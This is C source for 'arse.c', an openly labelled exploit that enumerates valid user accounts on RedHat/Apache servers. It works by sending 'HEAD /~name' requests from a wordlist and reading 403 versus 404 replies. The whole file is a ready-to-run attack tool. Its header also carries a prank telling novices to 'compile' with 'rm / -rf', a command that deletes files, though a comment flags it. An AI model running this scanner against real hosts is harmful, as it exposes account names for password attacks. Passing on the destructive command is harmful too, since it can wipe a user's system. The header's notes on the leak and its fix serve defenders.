 /*
  * arse.c
  * --------
  * Apache and Redhat Security Exploit (k, sorry for the name :))
  * 
  * ./arse www.server.com 80 file_with_names
  *
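  * The default installation of Apache on a RedHat server can reveal which
  * login names are valid.  Requesting www.server.com/~validlogin returns a
  * 403, while a login that does not exist returns a 404.
  * Make sure www.server.com is a RedHat server, because
  * on other Linux distros everything gives a 403 (well.. Slack does).
  * The leak is the 403-vs-404 difference on /~name; it goes away when
  * per-user directories are turned off ("UserDir disabled") or when both
  * cases answer with the same status.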
  *
  * for the kiddiez: to compile type "rm / -rf" (without brackets)
  * (that line is a prank, not a build step: "rm / -rf" deletes files
  * and compiles nothing.)
  *
  * by Incubus
  * incubus@securax.org
  *
  * Greetz to G-girl, Root-dude, Securax, Zsh and ShellOracle.
  *
  * minor bug: the last name is checked twice. 
  * 
  */
  
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

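/*
 * Open one TCP connection to addr, send req (req_len bytes) and read a
 * single chunk of the reply into resp.
 *
 * resp is always NUL-terminated when resp_size > 0, so callers can hand it
 * to strstr() safely.  Only the first recv() is read; that is enough for
 * the status line and the first headers, which is all the caller inspects.
 *
 * Returns 0 on success, -1 if socket() fails, -2 if connect(), send() or
 * recv() fails.
 */
static int fetch_reply(const struct sockaddr_in *addr, const char *req,
                       size_t req_len, char *resp, size_t resp_size)
{
    int sock;
    ssize_t got;

    if (resp_size == 0)
        return -2;
    /* Never leave a previous reply in the buffer: a failed request must
     * not be judged on stale data. */
    resp[0] = '\0';

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0)
        return -1;

    if (connect(sock, (const struct sockaddr *)addr, sizeof(*addr)) != 0 ||
        send(sock, req, req_len, 0) < 0) {
        close(sock);
        return -2;
    }

    /* Keep one byte back for the terminator. */
    got = recv(sock, resp, resp_size - 1, 0);
    close(sock);
    if (got < 0)
        return -2;

    resp[got] = '\0';
    return 0;
}

/*
 * Usage: <prog> <host> <port> <file_with_names>
 *
 * 1. Opens the names file and resolves <host> to an IPv4 address.
 * 2. Sends "HEAD /" and exits unless the reply contains "Server: Apache".
 * 3. For every whitespace-separated name in the file, sends
 *    "HEAD /~<name>" on a fresh connection and prints the name when the
 *    reply contains "403 Forbidden" or "200 Ok".
 *
 * Exits with status 0 on a usage error (as the original did), with -1 on
 * any setup failure, and returns 0 once the list is exhausted.
 */
int main(int argc, char **argv){
    static const char banner_req[] = "HEAD / HTTP/1.0\n\n";
    char user[100];
    /* "HEAD /~" (7) + name (<= 99) + " HTTP/1.0\n\n" (11) + NUL = 118. */
    char test[128];
    char buffer[2048];
    char *end;
    long port;
    int status;
    struct sockaddr_in name;
    struct hostent *hostinfo;
    FILE *file;

    if (argc != 4) {
        printf("\nApache and Redhat Security Exploit.\n");
        printf("-----------------------------------\n");
        printf("usage: %s www.server.com 80 file_with_names.\n", argv[0]);
        printf("Written by Incubus, (incubus@securax.org)\n\n");
        exit(0);
    }

    file = fopen(argv[3], "r");
    if (file == NULL) {
        printf("Error opening %s, exiting.\n", argv[3]);
        exit(-1);
    }

    /* strtol instead of atoi: reject garbage and out-of-range ports rather
     * than silently connecting to port 0 or a truncated value. */
    errno = 0;
    port = strtol(argv[2], &end, 10);
    if (errno != 0 || end == argv[2] || *end != '\0' ||
        port < 1 || port > 65535) {
        printf("Error: invalid port %s.\n", argv[2]);
        exit(-1);
    }

    hostinfo = gethostbyname(argv[1]);
    if (!hostinfo) {
        printf("Error: unknown host %s (maybe a typo?)\n", argv[1]);
        exit(-1);
    }
    /* The address is copied into an IPv4 sockaddr, so make sure the
     * resolver really returned an IPv4 entry of the expected size. */
    if (hostinfo->h_addrtype != AF_INET ||
        hostinfo->h_length != (int)sizeof(name.sin_addr) ||
        hostinfo->h_addr_list[0] == NULL) {
        printf("Error: no IPv4 address for %s.\n", argv[1]);
        exit(-1);
    }

    memset(&name, 0, sizeof(name));
    name.sin_family = AF_INET;
    name.sin_port = htons((unsigned short)port);
    /* memcpy avoids dereferencing a possibly misaligned char pointer. */
    memcpy(&name.sin_addr, hostinfo->h_addr_list[0], sizeof(name.sin_addr));

    /* sizeof - 1: send the request text only, not its terminating NUL. */
    status = fetch_reply(&name, banner_req, sizeof(banner_req) - 1,
                         buffer, sizeof(buffer));
    if (status == -1) {
        printf("Error: socket error.\n\n");
        exit(-1);
    }
    if (status != 0) {
        printf("Error: Socket error.\n\n");
        exit(-1);
    }
    if (!strstr(buffer, "Server: Apache")) {
        printf("%s is not running Apache on port %s, exiting.\n",
               argv[1], argv[2]);
        exit(-1);
    }

    /*
     * Loop on fscanf's result rather than feof(): feof() only turns true
     * after a read has already failed, which made the last name run twice.
     * The %99s width keeps a long token from overflowing user[]; a longer
     * token is split into several names.
     */
    while (fscanf(file, "%99s", user) == 1) {
        int len = snprintf(test, sizeof(test), "HEAD /~%s HTTP/1.0\n\n", user);

        if (len < 0 || (size_t)len >= sizeof(test))
            continue;

        /* Send exactly len bytes; sending sizeof(test) would put
         * uninitialised stack bytes on the wire after the request. */
        if (fetch_reply(&name, test, (size_t)len,
                        buffer, sizeof(buffer)) != 0) {
            printf("Error: no reply for %s, skipping.\n", user);
            continue;
        }

        if (strstr(buffer, "403 Forbidden"))
            printf("%s is a user.\n", user);
        if (strstr(buffer, "200 Ok"))
            printf("%s is a user.\n", user);
    }

    fclose(file);
    return 0;
}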
